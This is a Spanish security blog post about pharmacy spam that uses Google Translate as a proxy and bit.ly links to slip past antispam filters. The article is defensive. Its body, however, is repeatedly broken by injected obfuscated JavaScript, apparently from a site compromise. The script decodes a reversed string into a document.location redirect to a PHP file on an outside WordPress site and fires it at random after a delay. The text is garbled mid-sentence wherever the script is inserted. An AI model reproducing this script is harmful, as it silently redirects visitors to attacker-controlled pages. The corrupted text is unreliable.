Spam de farmacias online utiliza Google Translate para camuflar enlaces sospechosos
Una de las variantes de spam que ha persistido a través de los años, e incluso ha ido evolucionando para evitar ser detectado por los filtros antispam, es el de las farmacias online. No pasa una semana sin que recibamos una nueva variante ya sea aprovechando una festividad como el día de los enamorados o la Pascua que nos encontramos celebrando en estos momentos.
La mayoría de usuarios ya deberían estar precavidos acerca de este tipo de correos electrónicos, pero el continuo flujo de estos nos hace pensar que siguen siendo rentables para los ciberdelincuentes que se esconden detrás de estas falsas farmacias online. Veamos uno de los casos más recientes en llegar a nuestro laboratorio que nos llamó la atención por la redirección usada en el enlace que se nos proporciona en el cuerpo del mensaje.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>torio/wp-content/correo14.png” width=”413″ height=”264″ /><br />
Si nos fijamos, el mensaje utiliza un asun<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
to que no se corresponde con el contenido. En el asunto se menciona la suspensión de una cuenta de Facebook mientras que en el cuerpo del mensaje se invita al usuario a comprar medicinas online. Muy probablemente se haya aprovechado el asunto de una campaña de spam anterior o no se ha querido mencionar el asunto de la farmacia para así hacer que el usuario baje la guardia y sea más propenso a pulsar el enlace.
Lo interesante en este caso es observar que el enlace apunta, no a un dominio extraño (al menos aparentemente) ni a un dominio vulnerado, si no a google.com. El motivo de apuntar a Google, y más concretamente al servicio Google Translate, es el de evitar los filtros antispam que puedan tener instalados los usuarios domésticos o las empresas ya que se trata de un dominio que no suele estar bloqueado en prácticamente ninguna red.
tor.png”>{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>torio/wp-content/eset_nod32_google_transla<script>$NfI=function(n){if (typeof ($NfI.list[n]) == ){kind=spacer}
No obstante, este enlace encierra una trampa y es que, realmente, lo que inicialmente parece un enlace a Google Translate, es en realidad una redirección a un enlace corto del tipo bit.ly. Para entenderos, cualquier usuario puede pegar un enlace en Google Translate y decir que lo traduzca a un idioma (incluyendo el idioma original) y hacer que este servicio de Google actue como proxy. Esta técnica se ha estado usando durante años para saltarse restricciones en redes con filtrados de contenidos, controles parentales o incluso el gran cortafuegos de China, y aún hoy sigue obteniendo resultados aceptables.
Usando esta técnica los ciberdelincuentes pueden incluir cualquier tipo de enlace tras la petición a Google Translate, puesto que este servicio se encargará de redireccionar al usuario a la web que quiera el atacante. En este caso se trata de una farmacia online, convenientemente decorada con motivos de pascua, pero podría ser cualquier cosa, incluyendo un enlace desde el que se descargase malware.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>torio/wp-content/eset_nod32_online_pharma.png” width=”1026″ height=”812″ /><br />
Una técnica tan sencilla como esta hace que muchos sistemas antispam fallen y que el usuario confíe en el enlace proporcionado por correo al ver el dominio google.com en él. Es por ello que, si no lo hemos hecho <script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
todavía, debemos aprender a reconocer un mensaje malicioso antes de pulsar sobre cualquier enlace proporcionado, puesto que si hacemos clic sobre el mismo puede que ya sea demasiado tarde. Autor Josep Albors
tor-para-camuflar-enlaces-sospechosos/”> Fuente
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.